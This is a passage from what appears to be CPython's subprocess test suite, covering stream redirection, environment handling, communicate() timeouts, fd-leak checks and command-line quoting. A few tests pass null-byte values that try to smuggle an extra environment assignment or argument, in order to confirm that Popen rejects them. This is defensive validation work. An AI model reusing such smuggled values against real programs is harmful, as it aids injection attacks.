os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertEqual(stdout, b'42')
self.assertEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Proc object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIs(subprocess.Popen[bytes], subprocess.Popen)
self.assertIs(subprocess.CompletedProcess[str], subprocess.CompletedProcess)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
